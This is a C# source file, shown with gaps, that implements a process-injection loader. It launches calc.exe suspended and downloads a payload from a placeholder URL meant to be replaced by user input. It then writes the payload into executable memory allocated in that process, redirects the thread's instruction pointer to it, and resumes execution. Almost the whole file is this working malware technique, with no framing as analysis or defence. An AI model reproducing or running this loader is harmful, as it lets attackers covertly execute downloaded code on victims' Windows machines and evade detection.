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System.Net.Http;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Constants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const uint CREATE_SUSPENDED = 0x00000004;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const uint CONTEXT_FULL = 0x10000B;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const uint MEM_COMMIT = 0x1000;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const uint MEM_RESERVE = 0x2000;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const uint PAGE_EXECUTE_READWRITE = 0x40;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struct SECURITY_ATTRIBUTES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uint nLength;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public IntPtr lpSecurityDescriptor;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public bool bInheritHandle;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struct PROCESS_INFORMATION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public IntPtr hProcess;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IntPtr hThread;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uint dwProcessId;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public uint dwThreadId;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[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]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struct STARTUPINFO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public uint cb;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string lpReserved;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public string lpDesktop;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string lpTitle;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public uint dwX;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uint dwY;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public uint dwXSize;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public uint dwYSize;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public uint dwXCountChars;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public uint dwYCountChars;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public uint dwFillAttribute;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public uint dwFlags;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public ushort wShowWindow;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public ushort cbReserved2;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public IntPtr lpReserved2;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public IntPtr hStdInput;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public IntPtr hStdOutput;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public IntPtr hStdError;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struct CONTEXT64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public ulong P1Home;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public ulong P2Home;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ulong P3Home;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public ulong P4Home;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public ulong P5Home;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public ulong P6Home;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public uint ContextFlags;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public uint MxCsr;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public ushort SegCs;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public ushort SegDs;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public ushort SegEs;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public ushort SegFs;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public ushort SegGs;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public ushort SegSs;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public uint EFlags;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public ulong Dr0;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ulong Dr1;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public ulong Dr2;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public ulong Dr3;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public ulong Dr6;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public ulong Dr7;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public ulong Rax;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public ulong Rcx;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public ulong Rdx;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public ulong Rbx;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public ulong Rsp;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public ulong Rbp;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public ulong Rsi;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public ulong Rdi;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public ulong R8;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public ulong R9;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public ulong R10;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public ulong R11;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public ulong R12;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public ulong R13;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public ulong R14;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public ulong R15;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public ulong Rip;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P/Invoke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[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]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static extern bool CreateProcess(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string lpApplicationName,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string lpCommandLine,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IntPtr lpProcessAttributes,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IntPtr lpThreadAttributes,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bool bInheritHandles,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uint dwCreationFlags,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IntPtr lpEnvironment,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string lpCurrentDirectory,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ref STARTUPINFO lpStartupInfo,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out PROCESS_INFORMATION lpProcessInformation);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static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);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static extern bool ReadProcessMemory(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IntPtr hProcess,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IntPtr lpBaseAddress,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IntPtr lpBuffer,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uint nSize,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out IntPtr lpNumberOfBytesRead);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static extern IntPtr VirtualAllocEx(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IntPtr hProcess,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IntPtr lpAddress,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uint dwSize,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uint flAllocationType,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uint flProtect);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static extern bool WriteProcessMemory(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IntPtr hProcess,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IntPtr lpBaseAddress,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byte[] lpBuffer,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uint nSize,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out IntPtr lpNumberOfBytesWritten);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static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);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public static extern uint ResumeThread(IntPtr hThread);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static async Task Main(string[] args)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string payloadUrl = "http://example.com/payload.exe"; // Replace with user input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string targetExe = @"C:\WINDOWS\System32\calc.exe";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// Step 1: Create the target process in a suspended state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var processInfo = CreateSuspendedProcess(targetExe);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// Step 2: Download the payload asynchronously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byte[] payloadData = await DownloadPayloadAsync(payloadUrl);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// Step 3: Inject payload into the target process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InjectPayload(processInfo, payloadData);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Console.WriteLine("Injection complete.");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catch (Exception ex)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Console.WriteLine($"Error: {ex.Message}");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private static PROCESS_INFORMATION CreateSuspendedProcess(string targetExe)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Console.WriteLine($"Starting {targetExe} in suspended state...");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STARTUPINFO startupInfo = new STARTUPINFO();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PROCESS_INFORMATION processInfo;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(!CreateProcess(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targetExe,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CREATE_SUSPENDED,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ref startupInfo,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out processInfo))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throw new InvalidOperationException($"Error creating process: {Marshal.GetLastWin32Error()}");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processInfo;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private static async Task&lt;byte[]&gt; DownloadPayloadAsync(string payloadUrl)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Console.WriteLine("Downloading payload...");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using (HttpClient client = new HttpClient())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return await client.GetByteArrayAsync(payloadUrl);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catch (Exception ex)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throw new InvalidOperationException($"Error downloading payload: {ex.Message}");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private static void InjectPayload(PROCESS_INFORMATION processInfo, byte[] payloadData)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CONTEXT64 context = new CONTEXT64 { ContextFlags = CONTEXT_FULL };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if (!GetThreadContext(processInfo.hThread, ref context))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throw new InvalidOperationException($"Error getting thread context: {Marshal.GetLastWin32Error()}");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// Step 1: Allocate memory in the target process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IntPtr allocatedMemory = VirtualAllocEx(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processInfo.hProcess,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(uint)payloadData.Length,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MEM_COMMIT | MEM_RESERVE,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PAGE_EXECUTE_READWRITE);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(allocatedMemory == IntPtr.Zero)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throw new InvalidOperationException($"Error allocating memory: {Marshal.GetLastWin32Error()}");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Console.WriteLine($"Memory allocated at {allocatedMemory}");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// Step 2: Write payload to the allocated memory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IntPtr bytesWritten;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(!WriteProcessMemory(processInfo.hProcess, allocatedMemory, payloadData, (uint)payloadData.Length, out bytesWritten))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throw new InvalidOperationException($"Error writing payload: {Marshal.GetLastWin32Error()}");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// Step 3: Update the context with the new entrypoint (the allocated memory address)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context.Rip = (ulong)allocatedMemory;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if (!SetThreadContext(processInfo.hThread, ref context))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throw new InvalidOperationException($"Error setting thread context: {Marshal.GetLastWin32Error()}");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// Step 4: Resume the thread to start execution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(ResumeThread(processInfo.hThread) == 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throw new InvalidOperationException($"Error resuming thread: {Marshal.GetLastWin32Error()}");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Console.WriteLine("Payload injected and process resumed.");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